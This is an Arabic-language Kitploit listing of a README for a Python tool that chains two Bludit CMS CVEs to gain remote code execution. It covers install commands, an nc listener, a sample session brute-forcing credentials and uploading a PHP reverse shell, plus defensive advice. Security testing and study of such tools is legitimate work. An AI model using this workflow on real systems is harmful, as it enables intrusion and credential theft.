Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2016-16113-POC — cve-2016-16113 | Kitploit
أدوات/GitHubGitHub/d3vn0mi/cve-2016-16113-poc
هجمات كلمات المرورتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubd3vn0mi/cve-2016-16113-poc

CVE-2016-16113-POC

cve-2016-16113

عرض المستودع
12منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

احصل على RCE - استغلال نظام Bludit CMS

root@kitploit:~
     _ _____             ___            _ 
  __| |___ /_   ___ __  / _ \ _ __ ___ (_)
 / _` | |_ \ \ / / '_ \| | | | '_ ` _ \| |
| (_| |___) \ V /| | | | |_| | | | | | | |
 \__,_|____/ \_/ |_| |_|\___/|_| |_| |_|_|

أداة استغلال آلية تجمع بين CVE-2019-17240 (تجاوز المصادقة) و CVE-2019-16113 (رفع ملف عشوائي) لتحقيق تنفيذ تعليمات برمجية عن بُعد على تركيبات Bludit CMS القابلة للاستغلال.

⚠️ إخلاء مسؤولية قانوني

للاستخدام في الاختبارات الأمنية المصرح بها فقط

هذه الأداة مخصصة لمحترفي الأمن الذين يقومون بإجراء اختبارات اختراق مصرح بها وللباحثين في مجال الأمن الذين يعملون ضمن الحدود القانونية. الوصول غير المصرح به لأنظمة الكمبيوتر غير قانوني بموجب قوانين مثل قانون الاحتيال وإساءة استخدام الكمبيوتر (CFAA) في الولايات المتحدة وتشريعات مماثلة في جميع أنحاء العالم.

باستخدام هذه الأداة، فإنك توافق على:

  • اختبار الأنظمة التي تمتلكها فقط أو التي لديك إذن كتابي صريح لاختبارها
  • الامتثال لجميع القوانين المحلية والولائية والاتحادية المعمول بها
  • تحمل المسؤولية الكاملة عن أفعالك

المؤلف لا يتحمل أي مسؤولية ولا يكون مسؤولاً عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.

📋 نظرة عامة

يعمل هذا الاستغلال على أتمتة عملية:

  1. التحقق من توفر الهدف
  2. تجاوز المصادقة من خلال القوة الغاشمة (الاستفادة من CVE-2019-17240)
  3. رفع shell PHP خبيث عكسي (استغلال CVE-2019-16113)
  4. إنشاء اتصال shell عكسي

تفاصيل الثغرات

  • CVE-2019-17240: تجاوز المصادقة عبر تطبيق غير صحيح للحد من المعدل (تم تجاوزه باستخدام التلاعب برأس X-Forwarded-For)
  • CVE-2019-16113: ثغرة رفع ملف عشوائي تسمح بتنفيذ كود PHP خبيث

الإصدارات المتأثرة: Bludit CMS الإصدارات 3.9.2 وما دون

🚀 الميزات

  • ✅ التحقق الآلي من توفر الهدف
  • ✅ تجاوز المصادقة عبر القوة الغاشمة
  • ✅ إمكانية تعداد اسم المستخدم
  • ✅ القوة الغاشمة لاسم المستخدم وكلمة المرور معًا
  • ✅ معالجة تلقائية لرمز CSRF
  • ✅ توليد payload shell عكسي PHP
  • ✅ رفع ملف .htaccess لتعزيز الاستغلال
  • ✅ التحقق من الاتصال

📦 المتطلبات

  • Python 3.6+
  • حزم Python المطلوبة:
    • requests

🔧 التثبيت

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/yourusername/get-rce.git
cd get-rce

# تثبيت التبعيات
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.25.0

💻 الاستخدام

الاستخدام الأساسي

root@kitploit:~
python3 get_rce.py

سيطلب منك السكريبت:

  1. عنوان URL الهدف (مثال: https://target.com)
  2. عنوان IP الخاص بالمستمع
  3. منفذ المستمع
  4. ما إذا كنت تريد القوة الغاشمة لاسم المستخدم
  5. مواقع قوائم الكلمات

إعداد المستمع الخاص بك

قبل تشغيل الاستغلال، قم بإعداد مستمع netcat:

root@kitploit:~
nc -lvnp 4444

استبدل 4444 بالمنفذ الذي تختاره.

جلسة مثال

root@kitploit:~
$ python3 get_rce.py

Enter target URL (i.e. https://target.com): http://10.10.10.191
[ ~ ] Enter listener's IP: 10.10.14.5
[ ~ ] Enter listener's port: 4444
[...] Checking if the target is live...
[ + ] The target is live! We are good to go...

[ ~ ] Should I bruteforce username? [Y/N]: N
[ ~ ] What username should I use? (leave this to use admin as username): 
[...] We are gonna default to 'admin' as username.

[ ~ ] Enter the location for password list: /usr/share/wordlists/rockyou.txt
[ * ] Tried: 123456
[ * ] Tried: password
[ * ] Tried: 12345678
...
[ + ] Creds found: admin:Password123
[ + ] Login succeed... We are good to go :)

[ + ] The payload XyZaBcDeFg.php has been uploaded...
[ + ] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
[ + ] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php

أوضاع الهجوم

الوضع 1: اسم مستخدم معروف + القوة الغاشمة لكلمة المرور

root@kitploit:~
Should I bruteforce username? [Y/N]: N
What username should I use?: admin
Enter the location for password list: /path/to/passwords.txt

الوضع 2: القوة الغاشمة الكاملة للبيانات الاعتمادية

root@kitploit:~
Should I bruteforce username? [Y/N]: Y
Enter the location for username wordlist: /path/to/usernames.txt
Enter the location for password wordlist: /path/to/passwords.txt

📝 قوائم الكلمات الموصى بها

  • SecLists: https://github.com/danielmiessler/SecLists

    • أسماء المستخدمين: SecLists/Usernames/Names/names.txt
    • كلمات المرور: SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt
  • RockYou: /usr/share/wordlists/rockyou.txt (Kali Linux)

🔍 كيف يعمل

  1. التحقق من الهدف: التحقق مما إذا كان الهدف قابلاً للوصول
  2. تجاوز المصادقة:
    • التلاعب برأس X-Forwarded-For لتجاوز الحد من المعدل
    • القوة الغاشمة للبيانات الاعتمادية باستخدام قوائم الكلمات المقدمة
    • معالجة رموز CSRF تلقائياً
  3. الاستغلال:
    • رفع shell عكسي PHP إلى /bl-content/tmp/
    • رفع ملف .htaccess لضمان التنفيذ
    • تشغيل الـ payload لإنشاء shell عكسي
  4. الوصول إلى shell: الاتصال مرة أخرى بالمستمع الخاص بك

🛡️ إجراءات دفاعية

إذا كنت مسؤول نظام:

  • قم بالتحديث فوراً إلى Bludit 3.9.3 أو أحدث
  • قم بتطبيق الحد من المعدل المناسب بناءً على الجلسة وليس عنوان IP
  • تحقق من جميع عمليات رفع الملفات (النوع، الامتداد، المحتوى)
  • استخدم جدران حماية تطبيقات الويب (WAF)
  • راقب دليل /bl-content/tmp/ بحثاً عن ملفات مشبوهة
  • قم بتطبيق سياسات كلمة مرور قوية
  • فعّل آليات قفل الحساب

🐛 استكشاف الأخطاء وإصلاحها

مشكلة: "يبدو أن الهدف غير متصل"

  • تأكد من صحة عنوان URL وأنه يتضمن البروتوكول (http/https)
  • تحقق من اتصال الشبكة لديك
  • تأكد من أن الهدف يقوم بالفعل بتشغيل Bludit

مشكلة: "فشل تسجيل الدخول"

  • تحقق من صحة البيانات الاعتمادية
  • جرب قائمة كلمات أكثر شمولاً
  • تحقق مما إذا كان الهدف يحتوي على آليات مصادقة إضافية

مشكلة: "لم يتم استلام أي shell"

  • تأكد من أن المستمع الخاص بك يعمل
  • تحقق من قواعد جدار الحماية على كلا الجانبين
  • تأكد من أن عنوان IP ومنفذ المستمع صحيحان وقابلان للوصول

🔗 المراجع

  • تفاصيل CVE-2019-17240
  • تفاصيل CVE-2019-16113
  • الموقع الرسمي لـ Bludit

👤 المؤلف

d3vn0mi

📄 الترخيص

هذا المشروع مقدم لأغراض تعليمية واختبارات أمنية مصرح بها فقط. راجع إخلاء المسؤولية في أعلى ملف README هذا.

🤝 المساهمة

المساهمات والمشكلات وطلبات الميزات مرحب بها! لا تتردد في زيارة صفحة المشكلات.

⭐ شكر وتقدير

  • مجتمع أبحاث الأمن لاكتشاف وتوثيق هذه الثغرات
  • فريق Bludit لاستجابتهم السريعة في تصحيح هذه المشكلات
تنزيل الأداة